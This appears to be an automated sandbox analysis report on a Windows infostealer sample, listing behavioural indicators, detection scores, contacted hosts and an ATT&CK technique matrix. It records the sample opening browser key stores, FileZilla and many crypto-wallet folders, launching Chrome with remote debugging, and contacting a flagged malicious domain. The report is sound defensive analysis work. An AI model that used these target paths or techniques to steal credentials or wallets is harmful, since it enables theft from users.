                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Exodus\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Binance\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                Source: Inf.com Binary or memory string: WIN_81
                Source: Inf.com Binary or memory string: WIN_XP
                Source: Name.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Inf.com Binary or memory string: WIN_XPe
                Source: Inf.com Binary or memory string: WIN_VISTA
                Source: Inf.com Binary or memory string: WIN_7
                Source: Inf.com Binary or memory string: WIN_8
                Source: Yara match File source: 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Inf.com PID: 1276, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: 13.2.Inf.com.f0000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000000D.00000003.2418518687.0000000001529000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000003.2418604420.00000000044E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000003.2418255884.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000003.2418297625.0000000001505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000003.2418561056.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Inf.com PID: 1276, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 13_2_00A92263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,13_2_00A92263
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 13_2_00A91C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,13_2_00A91C61
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 1 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Extra Window Memory Injection | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 1 DLL Side-Loading | NTDS | 26 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 Extra Window Memory Injection | LSA Secrets | 1 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Process Injection | 121 Masquerading | Cached Domain Credentials | 221 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 2 Valid Accounts | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Virtualization/Sandbox Evasion | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                [Behavior graph omitted. Behavior Graph ID: 1581175, Sample: lem.exe, Startdate: 27/12/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label
                lem.exe | 11% | Virustotal |
                lem.exe | 5% | ReversingLabs |

                Source | Detection | Scanner | Label
                C:\ProgramData\9HDT0HDBIMOZ\68QI5X | 0% | ReversingLabs |
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com | 0% | ReversingLabs |

                No Antivirus matches
                No Antivirus matches

                Source | Detection | Scanner | Label
                https://bijutr.shop/e3f | 100% | Avira URL Cloud | malware
                https://publickeyservice.gcp.privacysandboxservices.com | 0% | Avira URL Cloud | safe
                https://bijutr.shop/bx | 100% | Avira URL Cloud | malware
                https://bijutr.shophhhv.default-release_cookies.dbta | 0% | Avira URL Cloud | safe

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                bijutr.shop | 188.245.216.205 | true | true |  | unknown
                chrome.cloudflare-dns.com | 162.159.61.3 | true | false |  | high
                t.me | 149.154.167.99 | true | false |  | high
                ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false |  | high
                sb.scorecardresearch.com | 18.165.220.57 | true | false |  | high
                www.google.com | 142.250.181.68 | true | false |  | high
                s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false |  | high
                googlehosted.l.googleusercontent.com | 142.250.181.65 | true | false |  | high
                clients2.googleusercontent.com | unknown | unknown | false |  | high
                bzib.nelreports.net | unknown | unknown | false |  | high
                assets.msn.com | unknown | unknown | false |  | high
                sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJ | unknown | unknown | false |  | unknown
                c.msn.com | unknown | unknown | false |  | high
                ntp.msn.com | unknown | unknown | false |  | high
                api.msn.com | unknown | unknown | false |  | high
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                https://www.ecosia.org/newtab/chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, 0ZC2DB.13.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://drive-daily-1.corp.google.com/manifest.json0.27.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.youtube.com/chrome.exe, 00000011.00000002.2697486285.000051D800CA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://drive-daily-5.corp.google.com/manifest.json0.27.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://duckduckgo.com/favicon.icochrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000011.00000002.2695136498.000051D800644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696111849.000051D8008D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://docs.google.com/spreadsheets/chrome.exe, 00000011.00000002.2696287556.000051D800944000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://anglebug.com/3078chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://anglebug.com/7553chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://anglebug.com/5375chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.youtube.com/s/notifications/manifest/cr_install.htmlltchrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://anglebug.com/5371chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://anglebug.com/4722chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://m.google.com/devicemanagement/data/apichrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602522382.000051D8001C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://anglebug.com/7556chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://drive-daily-4.cchrome.exe, 00000011.00000002.2694171038.000051D80030C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refInf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://chromewebstore.google.com/chrome.exe, 00000011.00000002.2692880330.000051D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2762439498.000054E000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2937100541.000051040458C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.27.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.youtube.com/?feature=ytcaoglchrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://drive-preprod.corp.google.com/manifest.json0.27.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://msn.comXIDv10Cookies.28.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://chrome.google.com/webstore/manifest.json.27.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://clients4.google.com/chrome-syncchrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://anglebug.com/6692chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://issuetracker.google.com/258207403msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://docs.google.com/document/doglchrome.exe, 00000011.00000002.2697390661.000051D800C54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/%Kchrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644390867.000051D8022C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2644448605.000051D8022CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://anglebug.com/3502chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          http://anglebug.com/3623msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            http://anglebug.com/3625msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
23.44.201.19 | unknown | United States | 20940 | AKAMAI-ASN1EU | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
142.250.181.68 | www.google.com | United States | 15169 | GOOGLEUS | false
                                                                                                                                                                                                                                              13.89.178.27
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              20.110.205.119
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              188.245.216.205
                                                                                                                                                                                                                                              bijutr.shopIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                              16322PARSONLINETehran-IRANIRtrue
                                                                                                                                                                                                                                              204.79.197.219
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                              142.250.181.65
                                                                                                                                                                                                                                              googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                              172.64.41.3
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                              23.209.72.40
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                              18.165.220.57
                                                                                                                                                                                                                                              sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                                                                              18.164.116.98
                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                              192.168.2.5
                                                                                                                                                                                                                                              127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581175
Start date and time: 2024-12-27 06:59:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 8s
Hypervisor based Inspection enabled: false
Report type: full
